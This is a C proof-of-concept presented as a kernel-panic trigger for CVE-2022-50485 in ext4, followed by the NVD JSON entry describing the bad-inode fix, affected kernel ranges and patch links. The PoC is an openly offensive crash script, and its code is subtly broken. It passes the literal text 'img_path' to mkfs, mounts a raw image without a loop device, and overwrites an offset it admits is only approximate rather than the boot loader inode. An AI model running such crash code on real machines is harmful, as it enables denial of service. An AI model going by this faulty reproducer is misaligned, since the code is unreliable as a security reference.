CVE-2022-50485

// CVE-2022-50485 PoC - Trigger kernel panic via bad inode in ext4 // This PoC demonstrates how to trigger the vulnerability by creating // a crafted ext4 filesystem with a corrupted boot loader inode. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/mount.h> #include <sys/stat.h> #define IMG_SIZE (64 * 1024 * 1024) // 64MB image #define BLOCK_SIZE 4096 int main(int argc, char *argv[]) { const char *img_path = "/tmp/cve_2022_50485.img"; const char *mount_point = "/tmp/cve_2022_50485_mnt"; int fd; // Step 1: Create a sparse file for the ext4 filesystem fd = open(img_path, O_RDWR | O_CREAT | O_TRUNC, 0644); if (fd < 0) { perror("open"); return 1; } if (ftruncate(fd, IMG_SIZE) < 0) { perror("ftruncate"); return 1; } close(fd); // Step 2: Create an ext4 filesystem on the image if (system("mkfs.ext4 -b 4096 -O ^metadata_csum,^64bit img_path") != 0) { fprintf(stderr, "mkfs.ext4 failed\n"); return 1; } // Step 3: Mount the filesystem mkdir(mount_point, 0755); if (mount(img_path, mount_point, "ext4", 0, "") < 0) { perror("mount"); return 1; } // Step 4: Corrupt the boot loader inode area // This simulates a bad inode condition for the boot loader inode // by directly modifying the inode table on disk fd = open(img_path, O_RDWR); if (fd < 0) { perror("open img"); return 1; } // Locate and corrupt inode table - inode #2 typically holds // the root directory, but we target the boot loader related inodes // by writing garbage to the inode table area off_t inode_table_offset = BLOCK_SIZE * 2; // Approximate offset char garbage[BLOCK_SIZE]; memset(garbage, 0xFF, sizeof(garbage)); lseek(fd, inode_table_offset, SEEK_SET); write(fd, garbage, sizeof(garbage)); close(fd); // Step 5: Remount to trigger ext4_iget() on the corrupted inode umount(mount_point); if (mount(img_path, mount_point, "ext4", 0, "errors=continue") < 0) { perror("remount"); // If mount fails, the corruption may have triggered the vulnerability printf("Mount failed - potential kernel panic triggered\n"); } // Cleanup umount(mount_point); rmdir(mount_point); unlink(img_path); return 0; }

{"cve": {"id": "CVE-2022-50485", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:45.340", "lastModified": "2026-03-25T00:25:42.740", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: add EXT4_IGET_BAD flag to prevent unexpected bad inode\n\nThere are many places that will get unhappy (and crash) when ext4_iget()\nreturns a bad inode. However, if iget the boot loader inode, allows a bad\ninode to be returned, because the inode may not be initialized. This\nmechanism can be used to bypass some checks and cause panic. To solve this\nproblem, we add a special iget flag EXT4_IGET_BAD. Only with this flag\nwe'd be returning bad inode from ext4_iget(), otherwise we always return\nthe error code if the inode is bad inode.(suggested by Jan Kara)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.10", "versionEndExcluding": "5.4.229", "matchCriteriaId": "D7CA85C8-20BC-4F07-8FD9-16F788191F2C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.87", "matchCriteriaId": "7B9E5B1C-CD46-4790-9500-615863850401"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.18", "matchCriteriaId": "08D38C5F-9644-4549-BBA6-F0860F024D14"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.4", "matchCriteriaId": "BC4189D9-5478-4E88-A78D-9C1DE29B217C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2142dfa1de61e25b83198af0308ec7689cca25d3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/488a5c2bf7543c3cd3f07a025f2e62be91599430", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/63b1e9bccb71fe7d7e3ddc9877dbdc85e5d2d023", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c0a738875c2e9c8c3366d792f8bf7fe508d5e5a5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f725b290ed79ad61e4f721fee95a287892d8b1ad", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f7e6b5548f915d7aa435d0764d41eacfb49c6e09", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}